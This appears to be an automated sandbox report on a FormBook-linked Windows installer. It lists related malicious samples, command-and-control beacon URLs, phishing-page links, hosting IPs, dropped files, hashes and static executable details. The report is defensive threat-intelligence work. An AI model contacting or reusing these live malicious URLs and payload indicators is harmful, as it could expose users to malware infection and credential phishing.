                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        2.57.90.16Image_0000384757.vbsGet hashmaliciousFormBookBrowse
                        • www.banyanwings.com/nbys/?bj=ZlP0QxCqErEBx/Ukp51TnVSNqvRCD4HlZmTgtTpg8+j4FdKcIkmiCp1LSayazaaXMCXS9xnz1gwcYx9w3WCi38SCxVG9ApFCUA==&kfh=KmQsQQxqanX
                        DHL_Express_INVOICE_AWB_CI_BL_PDF.exeGet hashmaliciousFormBookBrowse
                        • www.skydroptechpro.online/obq4/?q8Sl=-n1ukQ3-jf&DYe=O4Kw6I5T3ULir4gzZWVtxtlpTI0Xhv5Z9MJtWBtRaS4c1n7Nbxc6ZCmo0BQtKkUi3boHTZmgDY9cM82V2qzacbKO3ZiGXl8Now==
                        o0G3mAJ7Ud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.matchstats.site/hd4e/?Qt=lYdUIJGUVfOMODqAAXh0TMgvP1NUa0ctVgZnf2kvPSSOyyYWOxQ12uw4w2TsX3Nzs62FBNqY+O4mwbtHkuHzz05VGi4U1KiTHQ==&szm=-piDmSHeQ-mzBSst
                        hesaphareketi-01.PDF.exeGet hashmaliciousFormBookBrowse
                        • www.laylaroseuk.com/rdc9/?XC=4/fKm8asbTalW9RWsTSzxzAj8H/LArOnS31W3fbZiWi/U2Uh1mQWp9sYVj4sAPPFJPArLgELXNM77N7vzJ6IjHyHaCaMr7760g==&C8ZG6S=AfiTWQjWI
                        739202_931_pdf.vbsGet hashmaliciousFormBookBrowse
                        • www.vendasprimeonline.shop/iqt8/?IXGw=0QX1l2OeDwMpaxeqxEW+JXcuArmpinAWqSRJCRyWMWgRb3jXznFe4458Hddjl3D42Q8gA00op4e89zQwlB/r0C2pAczxFF19FA==&opYA=Y4QDjocjo7k
                        Aviso pagamento_08.03.2023.025104938.vbsGet hashmaliciousFormBookBrowse
                        • www.adacaranya.com/c5c8/?Nlsq=hn6k7-Uln&5VG=h5rcAevXt+B0Hok/M4bRSj6S/xc/RdXlkaS1XyqlLKZ2VoArp8Rieq5N5LkoGLhjtAzu1x7Q5jSNw4h2XGlSxBkuzvTVn20g9A==
                        sgK6Q5E4s9.exeGet hashmaliciousFormBookBrowse
                        • www.daylifesci.com/k4xe/?v_kG1oL=uDCgPSd/PCk66Fp6bpwMbo/nV2yNBUYvuSEQDxF8zt5G0gSpqrRMvgPXw3yjuTCiAKpnKQK9zpx7T+Nk7hey6oQUclMdRsEW8w==&owhLjZ=WxonvDEKZf3H9
                        E-DEKONT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.lecoledu4emeage.com/gg84/?4h9=0jl37nQyisdHj9++mwRPJy+xxTODqjX2ku6HL2RD1bf8jTWL05XNFhhTfMwT6fCm5Y+j&DB64X=4hQ8XH500XQ
                        youT1etAW5.exeGet hashmaliciousFormBookBrowse
                        • www.seufi.com/qsqm/
                        Aviso pagamento_07.03.2023.025104938.vbsGet hashmaliciousFormBookBrowse
                        • www.adacaranya.com/c5c8/?Lz15=tniK5ISyTfh&yWFo=h5rcAevXt+B0Hok/M4bRSj6S/xc/RdXlkaS1XyqlLKZ2VoArp8Rieq5N5LkoGLhjtAzu1x7Q5jSNw4h2XGlSxBkuzvTVn20g9A==
                        doc03400720230214100634.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.lecoledu4emeage.com/gg84/?URp=0jl37nQyisdHj9++mwRPJy+xxTODqjX2ku6HL2RD1bf8jTWL05XNFhhTfMwT6fCm5Y+j&7nU4D=2dDT3
                        Invoice.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?RMt6VS=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&mhD2S=xFOKq
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?ijpLUx=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw/Ed0TCbjPuUqC63g==&6ZoD=bhrt9_zYDQ
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?_RzZz=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&om2=xIuxrOTDSx
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?Ssok=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw/Ed2SQWEzuGaaM3g==&1fN91=FJFft4ZVnQubH
                        PI160256.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?UUQQSY2=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&F7=zYCXuN8v
                        rpayment.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.solutionsquik.net/vg57/?vb1S=uU2JNTATo&XtCa4=JuvBI6GNJ7B19ZNzGvZj0zJSJeiwdSbkPyARskm/5xz7GE3LX8TYJk4heqzaJ+xq2j6Qf6smanThsJJ5j5/bHqVaOb0YPb4oww==
                        NEWORDER.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.victorywash.co.uk/2huh/?sRp=8ostyhaqpOrps&5b=8pdW9QI9iqeO48mTO37sBXHEKQznS/B9dkJ7QZb4zC8Fo2S0kKHwZZqiHDDJODppSCRdilR1P3xK20n3QrdxP84LjFOmxNSs2w==
                        E-Dekont.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.khukhrainworldbrotherhood.com/m62e/?k0D=R+V2qaC1XMtrRTqmFS/tH0N2mS0TrF/v0f32JYCU4JE+FKIpRucCWFL33ADFQO+wQFMZ&a4HxM=3flpdH20DhBhDr9
                        230227.exeGet hashmaliciousFormBookBrowse
                        • www.imaliaskari.com/keht/?dO=xmfHyfY3/r1L4Ez2uB/lGCdoND9Xxz4tNm/Dz71+5Zl1bz50qtJUzKMfK5MLts3CM0x/pmjeV8IVv/XrzzsvWBQOVm8NO+e3PQ==&8xfLDX=KZulFzmVGXCfU

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.incentiveexcellence.comSecuriteInfo.com.Exploit.CVE-2017-11882.123.17263.30962.rtfGet hashmaliciousFormBookBrowse
                        • 66.113.136.229
                        overdue.aliyun.comw8jII3Mlbs.exeGet hashmaliciousFormBookBrowse
                        • 170.33.96.51
                        PO 80555231 Pdf.exeGet hashmaliciousFormBookBrowse
                        • 170.33.96.51
                        2384de40-a1de-4db0-a358-6ea765fb272a.pptxGet hashmaliciousUnknownBrowse
                        • 170.33.9.230
                        e-dekont.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        kgKZQkHkMV.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        6hyWrD20Ho.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        PO.xlsxGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Alligator Pty Ltd Quote.docGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Lv9eznkydx.exeGet hashmaliciousUnknownBrowse
                        • 170.33.9.230
                        UZOM POWER.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Af2ehGbXlD.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        DHL Shipment Notification.PDF.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        DHL Shipment Notification,PDF.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Drawing.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        TT-Bank-Slip.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Product_Samples.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        PO_2021005.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        POSWM240521.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        ee7727ed_by_Libranalysis.exeGet hashmaliciousFormBook GuLoaderBrowse
                        • 170.33.9.230
                        4231.pdf.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AS-HOSTINGERLTpete.theron Retirement Funds Increased Contribution Statement_Payments.htmGet hashmaliciousHTMLPhisherBrowse
                        • 45.15.25.111
                        https://tttttthhgfh.s3.eu-north-1.amazonaws.com/1.htm?response-content-disposition=inline&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEAYaCXVzLWVhc3QtMiJGMEQCIGAePNH5kc%2F2xpHWGlZ5GLvMvsC2s6%2BIxNp6FEquZcoyAiBTtJbLFx6DvagON2F%2FB6BHAGLFh2R%2Fc2mWpBgwj1pOVirtAgjA%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDgzODQ0NTkyMjIxNSIMlhEqeRq6ghQI%2FAz%2BKsECVIW4mTPUpwPw1foXbkjDniNG0Xk1Jazp2mgTJGx3njiW6HTZ0s9JbBs8R1Id4H%2F5MG%2FSMl8sA5CncoLRoaa4bBzG5S6OiAErK%2Fq7jiCodlm9LPxzbfHtwTL%2B6hW%2FWsoghaKCYPiwxw2F4628zcdZyATOc6%2F%2F2j4Ubbqo8Ek3gc43gL%2B7KbI1MNPOeljg1y1gZqq5NyQf5cyJB1y%2FPjlUvxwnwQubFYxQYrKnCAHbzRUgQhYFWtZo8yZlbBlW9D0oBcDttRrQTjA%2FVUHkAm8yk8Z4TKIEL4T%2F7WiAUaPZDIUtv%2FBj790%2F7V1Bv%2B7E442GdlxTiN%2Bz1DS5M41VyCR0FtNCk9VFjA0R60aB9ByfogyUHmEsdENHj9YezHQbDygZ9sOH0HzL2Y2cCtaeTzUHuIVP4hqxN59FAOeRm4kGr5y7MMLlvKAGOrQCQCiSSqN8Fj2XWglbnegNI4hLNrpo0myJcwyKXR3SE7u6PXYMWbgL40zITJ%2BQA6FksSyazHDpaJX24swaybT0qluPxUcx8pTNyhFPrwNZy9xSqcLbJceZvzoaDv41EJPpzjgU1HNphWdPz0mk5pM8kxb5%2BS0m6jQpxbRgxOP4OXz%2B8EDdHJZOEFoafwSFfUZa8Jz4270QqlF18mdT90of833nLgKjEZva1dJ2MBsho58vqtrjHOAm3Ot7WWX1P2Xn%2BAWcrbWu0Myd7LavkIttl5YRVlyi5FegyC8B%2BSTaT1oRgLeEx9m4ZJeVp01839HIAEeAQB0DmICYqEphD364lcm4n5I3HzoahVd1%2BK6b1MEgzFlhWr1QdStHoJnkyl9DZy0GeA7FAkCtQ7wFjX%2F5fSVNJc0%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20230313T190754Z&X-Amz-SignedHeaders=host&X-Amz-Expires=43199&X-Amz-Credential=ASIA4GN2FO6T2VVZECOU%2F20230313%2Feu-north-1%2Fs3%2Faws4_request&X-Amz-Signature=8194463760e03d09d343d15cd17c12d16df0d09a868e6cf71a09731b1c7259acGet hashmaliciousHTMLPhisherBrowse
                        • 31.220.53.202
                        https://aergaergf.s3.ap-south-1.amazonaws.com/ksljd90we35.html?response-content-disposition=inline&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIQDc6t%2BDHzNxajKZVTYAbCDR94fr6dcO%2FA57iD8xlAmpCQIfMJu1iQ9CyRfTgqGVVcynpYBv95HAgDEZ5eV9XDvD6irtAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDY4NTc5NTIyNDE5NiIMh0dyvbvQ9Tgv8%2BBpKsECPNVvfwMKzuNfGPaJImsTbSq263RNTpTtSJkjgDiD4A5I6jl%2FNG0qiYhDq%2FBj2i%2FTbYaF%2B789BgjeqydBSH2%2F8jP2aDkIAT%2Bpccd9j%2BrwRnLUgC8uvWOaI6SBbSt%2Ba5HIKjoNWU13AKDUW4mDOdZzkIsFSBJKwMrHJsRUq4fCKfSeAJAzKz%2Fxii0Jq1mwcRwxJPiEBw3Zh9FIvN5p3h9EuI8QX4D9l4Es1GoFLmiYlXaOuSi6IwjdG1fEawjRwa%2FSkfhhquXh5n%2B0wG1NLTuKaqPt2Xhbcde47IpbRSJhhYO3Q1EXZ2xcbF1lRQyII5uiX2GLS7GSXWv%2Fjg2EoCLytrhHggmDtLmEpFyXloYKuNSOZZgQRU6IRecEMGmzpDppWocmApCGqNMaCmQA1lmsPnN9yuBQZ0wO697G0mMuzxqgMNOnvaAGOrQCz9qdhgXFtebnO%2BWfPyMCSc5OgXO9%2F5MSfnI9ql3QTbbDNwB%2FcyXcrqhboBhg2VMlMe1u75HTK8sGfwgKrHL%2F3A5kafHunQNv%2F8MOIjxM7N9h9JN%2FANjzCfElDjU6X%2FEO2qiw8wJH9a6tQAPDDoUbBMDW1yjhpX2SeohZLgtejxbHwVDEtJO5EcU0YPAhtgNfvvl7Tefuw0iJ8tjkYhX%2FWRznHmsJ19NhuG%2F%2BrwxHsmtXT7ybO8hbcYaatxUJmh%2FL9dFR8EnpXXsasdf8E2g7DLrWwJED3A4tYEan7L%2Bo7bxLaZAAXboxKaj0TGVp5017APhAlOORSjIgLi1yOnOhGOI63krFq2hnF8pNvXFot5nOhhpB98FCYXBtcUVG4%2B3sCm3JGA%2ByKxwiuVx1al82oZEtEls%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20230313T170704Z&X-Amz-SignedHeaders=host&X-Amz-Expires=43200&X-Amz-Credential=ASIAZ7LEUVKCALOHWBFR%2F20230313%2Fap-south-1%2Fs3%2Faws4_request&X-Amz-Signature=f4fb8b026c5756152a8261a481cf2e36e5f4fa06c3f85403e880a320fe43fe47Get hashmaliciousHTMLPhisherBrowse
                        • 31.220.55.19
                        forest service pse agreement form 53882.jsGet hashmaliciousUnknownBrowse
                        • 194.59.164.48
                        ian.marshall RRSP Increased Contribution Statement_Payments.htmGet hashmaliciousHTMLPhisherBrowse
                        • 31.220.60.210
                        RRSP Increased Contribution Statement_Payments.htmGet hashmaliciousHTMLPhisherBrowse
                        • 31.220.60.210
                        pbuchanan RRSP Increased Contribution Statement_Payments.htmGet hashmaliciousHTMLPhisherBrowse
                        • 31.220.60.210
                        daniel.ding Retirement Funds Increased Contribution Statement_Payments.htmGet hashmaliciousHTMLPhisherBrowse
                        • 31.220.60.210
                        Background Photo Editor_8.08_apkcombo.com(1).apkGet hashmaliciousUnknownBrowse
                        • 193.46.196.51
                        Background Photo Editor_8.08_apkcombo.com(1).apkGet hashmaliciousUnknownBrowse
                        • 193.46.196.51
                        Image_0000384757.vbsGet hashmaliciousFormBookBrowse
                        • 2.57.90.16
                        81m7ilw9ep2T7m2c8lY6iwcwfFOaKRq0Ll.dllGet hashmaliciousEmotetBrowse
                        • 153.92.5.27
                        iYp2OPN5eO.dllGet hashmaliciousEmotetBrowse
                        • 153.92.5.27
                        ZrzLi60LcL5vW.dllGet hashmaliciousEmotetBrowse
                        • 153.92.5.27
                        DHL_Express_INVOICE_AWB_CI_BL_PDF.exeGet hashmaliciousFormBookBrowse
                        • 2.57.90.16
                        fattura.docGet hashmaliciousEmotetBrowse
                        • 153.92.5.27
                        o0G3mAJ7Ud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 2.57.90.16
                        hesaphareketi-01.PDF.exeGet hashmaliciousFormBookBrowse
                        • 2.57.90.16
                        20320220702.jsGet hashmaliciousWSHRATBrowse
                        • 194.59.164.67
                        Form - Mar 09, 2023.docGet hashmaliciousEmotetBrowse
                        • 153.92.5.27
                        ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimitedw8jII3Mlbs.exeGet hashmaliciousFormBookBrowse
                        • 170.33.96.51
                        PO 80555231 Pdf.exeGet hashmaliciousFormBookBrowse
                        • 170.33.96.51
                        http://cdn.examhome.netGet hashmaliciousUnknownBrowse
                        • 170.33.9.227
                        http://cdn.examhome.netGet hashmaliciousUnknownBrowse
                        • 170.33.9.227
                        2384de40-a1de-4db0-a358-6ea765fb272a.pptxGet hashmaliciousUnknownBrowse
                        • 170.33.9.230
                        KzTwbZkCyW.dllGet hashmaliciousWannacryBrowse
                        • 170.33.115.14
                        0ZY5S178zS.dllGet hashmaliciousWannacryBrowse
                        • 170.33.28.122
                        fcZBQq5qMC.dllGet hashmaliciousWannacryBrowse
                        • 170.33.217.29
                        aJF1hL1hAJ.dllGet hashmaliciousWannacryBrowse
                        • 170.33.70.3
                        irc.i686.virGet hashmaliciousMiraiBrowse
                        • 170.33.213.203
                        kp2PrktbeFGet hashmaliciousMiraiBrowse
                        • 170.33.173.128
                        e-dekont.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        x86Get hashmaliciousMiraiBrowse
                        • 170.33.213.209
                        uhZvCiriMyGet hashmaliciousMiraiBrowse
                        • 170.33.213.209
                        kgKZQkHkMV.exeGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        PO.xlsxGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        Alligator Pty Ltd Quote.docGet hashmaliciousFormBookBrowse
                        • 170.33.9.230
                        DHL-D02816048INV.exeGet hashmaliciousFormBookBrowse
                        • 170.33.14.35
                        Payment Advice_pdf.exeGet hashmaliciousFormBookBrowse
                        • 170.33.12.250
                        xpbSY3omz8.exeGet hashmaliciousFormBookBrowse
                        • 170.33.12.250

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\afhjjq.exePO130323_-_MARINOVA-GROUP.docGet hashmaliciousFormBookBrowse

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                          Download File
                          Process:C:\Windows\explorer.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):984
                          Entropy (8bit):5.2414849034866355
                          Encrypted:false
                          SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                          MD5:4816271302882BDFB06EE40F624169D1
                          SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                          SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                          SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                          Malicious:false
                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}

                          C:\Users\user\AppData\Local\Temp\afhjjq.exe

                          Download File
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):61440
                          Entropy (8bit):6.26576970039738
                          Encrypted:false
                          SSDEEP:768:oXJxBLApCDxvhqBrcbQdYPaPfhJAx1oZakLSO0OYCiPBjgFSd+ChG5oev3P:oXBdxsBwfaPJJtZFLkPay+V5oe/
                          MD5:6C148CA1A207DD5BE97C1726A9F4BABF
                          SHA1:5D83F24590C088BDBC2FF57517E3F1D4F4294F82
                          SHA-256:C9050FBAD700FC0418AAAB01231CF06AC3505F581846C075774E1D3EA5967F49
                          SHA-512:F42AEEAE92273F6E00CEFF29FD62A76C0D5E5D6BE9192EFE939DC2C3934863333EE7875AC56530CB333B46EDC1CD006CEBF4DBB3D5FF848D18FEE8F6D74BB5B1
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 30%
                          Joe Sandbox View:
                          • Filename: PO130323_-_MARINOVA-GROUP.doc, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......??..{^..{^..{^....j.z^..e.x.[^..e.i.k^..e....^..\...n^..{^...^..e.u.z^..e.n.z^..e.m.z^..Rich{^..........................PE..L.../..d.....................d....................@..........................0............@.............................#...|................................ .......................................................................................text.............................. ..`.rdata...$.......&..................@..@.data....,..........................@....reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq

                          Download File
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6141
                          Entropy (8bit):7.137960909941223
                          Encrypted:false
                          SSDEEP:96:Farc6oYOEg/DrYuPk2XO5oSw0JTh4mbhvQF7KGOCAdqM5d7j5xXIf/3AVWmPX:FarcRxTXhX1SJlhPV07Kn4AdMvNmPX
                          MD5:AA88817FC5FD4CD5A7103798997D04B9
                          SHA1:11B7ED37BAB8E7D5A4966673D202730E89F94AF0
                          SHA-256:77FD4ABEA079556813970A1B1AD65D682C4539E98812981E07485C955434C07F
                          SHA-512:774419F331641F77A5ABEBAA42DC494E3567C25AB4A1F36003F70F3A38FE8516686DC652FEAD48E9DD3CA3C577905A60495F25EFC955BC372974DB2D2820C1EF
                          Malicious:false
                          Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                          C:\Users\user\AppData\Local\Temp\moqfkh.h

                          Download File
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):210121
                          Entropy (8bit):7.993466491121605
                          Encrypted:true
                          SSDEEP:6144:8cBH1w3LOwHHItwB9FuhQw88TRlttw86RQ2N:tHKLZHItw8+w88TRlN6RQK
                          MD5:A4C230F42D52806C6779B507BEB4C4A4
                          SHA1:AF46D2A7ED595DEDA5E6CE5C6D2A6B313B02D575
                          SHA-256:B76CC6EB93B26C0338E12678D98299C4F8369D120BEBA567809C82F4AD7CAC05
                          SHA-512:BF3DA03A2C7CF5C0BFED81AAB1F4D40D5F1F941AB1E160E54553BC9C37B979421A3C36B72A586E9B02EA8D106BA640B962C065AA6DE67AA06664E717A1ACA723
                          Malicious:false
                          Preview:.3...i..P9..pb.w...a.../K....J..C..a...]j..[..1'...=|.})*._`Z....$X.;.\........B...h#7_....u.:`.P..{..V..1..-....>a.Az....PV2lZ.|~.M-,..=B.D6..`;.kI.-......../K5.V.v.+...z.&P...>.........@...Vj....<.c..<m.....M...-5.X.^nJ...[u........W.......B..i....EZ......a..<..#..rY....WC..a..n]j..[..1'..=|.})A._`;......8...e`..4...s_R.....R.,].eQ..|Y..C..GbL.l.z..;>a.Az....7..g|.(.....",.B..B..39....#/.|d..sS.$#0..}..+...z.&s..y....u....b...H\.{..<.c..<....~.....-5.X.^n....[8.........W./....,.P..i..P..Z....T|a..<..#...Y.J..C..a...]j..[..1'...=|.})A._`;......8...e`..4...s_R.....R.,].eQ..|Y..C..GbL.l.z..;>a.Az....7..g|.(.....",.B..B..39....#/.|d..sS.$#0..}..+...z.&P...>........*...'h\....<.c..<....~......-5.X.^n....[8.........W./....,.P..i..P..Z....T|a..<..#...Y.J..C..a...]j..[..1'...=|.})A._`;......8...e`..4...s_R.....R.,].eQ..|Y..C..GbL.l.z..;>a.Az....7..g|.(.....",.B..B..39....#/.|d..sS.$#0..}..+...z.&P...>........*...'h\....<.c..<....~......-5.X.^n

                          C:\Users\user\AppData\Local\Temp\nstD266.tmp

                          Download File
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):291732
                          Entropy (8bit):7.662840821381332
                          Encrypted:false
                          SSDEEP:6144:6cBH1w3LOwHHItwB9FuhQw88TRlttw86RQ2hzp7UH3:nHKLZHItw8+w88TRlN6RQeGH
                          MD5:C2BD55F529A34EC18FEF9FAEB69547FB
                          SHA1:0A09C36745799061847A82CB1896AEDB85260FA3
                          SHA-256:43047F6EF3E258AF4BA08EBA64E8F9DC538BBFD985F4151D054C44375FCC47BD
                          SHA-512:2CFA99FB56B5691079EB256D19F31DF0D6267260241BFF4106FF8EB261D7382261E6DD32595D519AF57A364B43D708C1D21F4CF7C157117C7B9B41B47600F4C1
                          Malicious:false
                          Preview:.6......,...................|....'.......5.......6..........................................................................................................................................................................................................................................G...................j...............................................................................................................................3...........:...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.913061878797616
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:YSpCB8DEek.exe
                          File size:271045
                          MD5:d927de8cecb8523b956d2bb2098d20ef
                          SHA1:cb01b1c8bea968c8919c7303d10ec5b4c520691c
                          SHA256:e2f96798a7d58ac8a06c39d4459336c8fddafec67fe12cda3c9d4e497702601f
                          SHA512:50a0c0311ef199cd18b7c60030b01ecabef3bcad5f63cc5f9f81fb9f43c8b61ff7224b2659c109e1c91bdd4a0b32e0c1ce31ab49544bfc487fec35a318eed6a2
                          SSDEEP:6144:TYa6H9QQB+NJQKc1gwzCJNIuhjtUc3sCuv9rej4sDza9OvLQO8:TYp9QQB+3QKc6XIuZK7Cey6xZ
                          TLSH:AE4412953AF8E02BEC7317736BB853265FFAAD438455860B2740D70EFA252548E1F362
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                          Static PE Info

                          General

                          Entrypoint:0x403640
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:61259b55b8912888e90f516ca08dc514

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A230h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080C8h]
                          mov esi, dword ptr [004080CCh]
